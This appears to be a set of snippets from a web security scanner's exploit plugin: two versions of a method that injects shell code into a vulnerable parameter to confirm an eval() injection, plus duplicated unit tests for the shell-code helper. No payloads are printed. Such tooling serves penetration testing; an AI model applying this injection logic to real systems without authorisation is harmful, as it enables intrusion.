def _verify_vuln( self, vuln_obj ):
'''
This command verifies a vuln. This is really hard work!
@parameter vuln_obj: The vulnerability to exploit.
@return : True if vuln can be exploited.
'''
# Get the shells
extension = vuln_obj.getURL().getExtension()
# I get a list of tuples with code and extension to use
shell_code_list = shell_handler.get_shell_code( extension )
for code, real_extension in shell_code_list:
# Prepare for exploitation...
function_reference = getattr( self._urlOpener , vuln_obj.getMethod() )
data_container = vuln_obj.getDc()
data_container[ vuln_obj.getVar() ] = code
try:
http_res = function_reference( vuln_obj.getURL(), str(data_container) )
except Exception:
continue
else:
cut_result = self._define_exact_cut( http_res.getBody(), shell_handler.SHELL_IDENTIFIER )
if cut_result:
self._shell_code = code
return True
# All failed!
return False
def _verify_vuln(self, vuln_obj):
'''
This command verifies a vuln. This is really hard work!
:param vuln_obj: The vulnerability to exploit.
:return : True if vuln can be exploited.
'''
# Get the shells
extension = vuln_obj.get_url().get_extension()
# I get a list of tuples with code and extension to use
shell_code_list = shell_handler.get_shell_code(extension)
for code, real_extension in shell_code_list:
# Prepare for exploitation...
function_reference = getattr(self._uri_opener,
vuln_obj.get_method())
data_container = vuln_obj.get_dc()
data_container[vuln_obj.get_var()] = code
try:
http_res = function_reference(vuln_obj.get_url(),
str(data_container))
except w3afException, w3:
msg = 'An error ocurred while trying to exploit the eval()'\
' vulnerability. Original exception: "%s".'
om.out.debug(msg % w3)
else:
if shell_handler.SHELL_IDENTIFIER in http_res.get_body():
msg = 'Sucessfully exploited eval() vulnerability using'\
' the following code snippet: "%s...".' % code[:35]
om.out.debug(msg)
self._shell_code = code
return True
def test_get_shell_code_invalid_extension(self):
shells = get_shell_code('123456')
self.assertEqual(len(shells), 1)
php_shell_code, lang = shells[0]
self.assertEqual(lang, 'php')
self.assertIn('echo ', php_shell_code)
def test_get_shell_code_extension_force(self):
shells = get_shell_code('php', True)
self.assertEqual(len(shells), 1)
php_shell_code, lang = shells[0]
self.assertEqual(lang, 'php')
self.assertIn('echo ', php_shell_code)
def test_get_shell_code_invalid_extension(self):
shells = get_shell_code("123456")
self.assertEqual(len(shells), 1)
php_shell_code, lang = shells[0]
self.assertEqual(lang, "php")
self.assertIn("echo ", php_shell_code)
def test_get_shell_code_extension_force(self):
shells = get_shell_code("php", True)
self.assertEqual(len(shells), 1)
php_shell_code, lang = shells[0]
self.assertEqual(lang, "php")
self.assertIn("echo ", php_shell_code)
